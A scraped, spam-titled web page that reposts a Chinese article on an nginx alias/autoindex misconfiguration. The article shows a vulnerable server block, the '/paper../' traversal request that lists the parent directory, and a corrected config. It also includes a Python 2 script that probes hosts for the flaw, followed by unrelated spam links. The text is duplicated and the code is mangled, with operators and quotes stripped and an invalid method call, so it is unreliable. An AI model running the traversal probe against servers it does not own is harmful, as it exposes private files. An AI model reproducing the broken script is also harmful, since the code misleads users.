当前位置: 首页 > news >正文

wap建站系统网站制作公司知道万维科技

news 2025/12/14 21:14:38
wap建站系统,网站制作公司知道万维科技,技术支持:上海网站建设,自己做的网站项目怎样卖nginx 是一款高性能的 web 服务器#xff0c;使用非常广泛#xff0c;其不仅经常被用作反向代理 在 nginx 中开启 autoindex#xff0c;配置不规范而造成目录遍历漏洞 配置如下#xff1a; server { listen 80; server_name *.*.*.*; index index.htm index.html; root …nginx 是一款高性能的 web 服务器使用非常广泛其不仅经常被用作反向代理 在 nginx 中开启 autoindex配置不规范而造成目录遍历漏洞 配置如下 server { listen 80; server_name *.*.*.*; index index.htm index.html; root /home/wwwroot/www; access_log off; location /paper { alias /home/wwwroot/paper/; autoindex on; } } 注意 这里 /home/wwwroot/paper/; 有个 / 当你浏览 http://*.*.*.*80/paper/, 正常情况应该遍历 /home/wwwroot/paper/ 这个目录但是如果访问 http://*.*.*.*80/paper../ 这个的话就会遍历 /home/wwwroot/ 这个目录了 nginx 是一款高性能的 web 服务器使用非常广泛其不仅经常被用作反向代理 在 nginx 中开启 autoindex配置不规范而造成目录遍历漏洞 配置如下 server {listen 80;server_name *.*.*.*;index index.htm index.html;root /home/wwwroot/www;access_log off;location /paper {alias /home/wwwroot/paper/;autoindex on;} } 注意 这里 /home/wwwroot/paper/; 有个 / 当你浏览 http://*.*.*.*80/paper/, 正常情况应该遍历 /home/wwwroot/paper/ 这个目录但是如果访问 http://*.*.*.*80/paper../ 这个的话就会遍历 /home/wwwroot/ 这个目录了 nginx (Tested at 1.1.10) sebug 建议 使用如下配置 location /paper {alias /home/wwwroot/paper; } 或 location /paper/ {alias /home/wwwroot/paper/; } 接下来介绍一个自己测试用到的检测脚本用 Python 编写 #!/usr/bin/env python # -*- coding: utf_8 -*- # nginx配置错误目录遍历漏洞 # Date: 2019-01-14 import sys import urllib2 from lxml import etreepocs [logs, test, paper]def nginx_test(ip, port):try:for poc in pocs:try:res1 urllib2.urlopen(http:// ip : port / poc, timeout 5)res_1 res1.read()code1 res1.getcode()server1 res_1.getserver()cmp_str1 Index of / poc /html1 etree.HTML(res_1)title1 html1.xpath(//title)# print title1[0].textif code1 200 and cmp_str1 title1[0].text:res2 urllib2.urlopen(http:// ip : port / poc ../, timeout 3)res_2 res2.read()code2 res2.getcode()cmp_str2 Index of / poc ../html2 etree.HTML(res_2)title2 html2.xpath(//title)# print title2[0].textif code2 200 and cmp_str2 title2[0].text and res_1 is not res_2:print Truereturn Trueexcept Exception,e:print error:, epassreturn Falseexcept Exception,e:print ereturn Falsenginx_test(IP, PORT)
http://wiki.neutronadmin.com/news/48744/

相关文章:

  • 建网站要备案深圳坪山高铁站
  • 中国最大免费wap网站diy小程序开发平台
  • 江镇做包子网站合肥市城乡城乡建设局网站
  • 网站为什么要维护陕西交通建设集团西镇分公司网站
  • jq网站登录记住密码怎么做企业网站的一般要素包括哪些
  • 网站设计的素材有哪些网站上传系统
  • 东莞集团网站建设规定学做网站需要学那些程序
  • 网站根目录 设置网站域名解析到了空间 但空间未绑定此域名
  • 建设网站要求dede网站微信分享封面
  • 兰州市城乡建设局网站公布的信息吴中区网站建设技术
  • 网站建设设计师手机网站与PC网站
  • 新民电商网站建设价格咨询附近的招聘工作
  • 在哪里做百度网站wordpress 米课
  • 购物网站服务器硬件配置鲜花便宜的网站建设
  • 学校网站源码htmlwordpress 手机更新
  • 腾讯云10g数字盘做网站够么现在收废品做哪个网站好
  • 辽阳网站seo深圳网站建设明细报价表
  • 苏州市建设中心网站装修效果图网站
  • 手机网站开发企业天津推广平台
  • 在线相册jsp网站开发与设计韶关住房和城乡建设网站
  • 中国建设银行安徽省招聘信息网站中国建设教育协会安全员证
  • 微信群如何推广网站建设wordpress上传安装包
  • 大冶seo网站优化排名推荐泰安网站设计公司
  • 有了实名制域名怎么做网站移动软件管理的应用场景
  • 东莞网站制作模板dede手机网站更新
  • 如何用xampp做网站wordpress自定义幻灯
  • 网站建设黄页软件设计品牌logo
  • 网站建设找实体还是淘宝wordpress meta
  • 挣钱网站一小时两百最新上线的手游
  • 成都网站推广 优帮云wordpress药店主题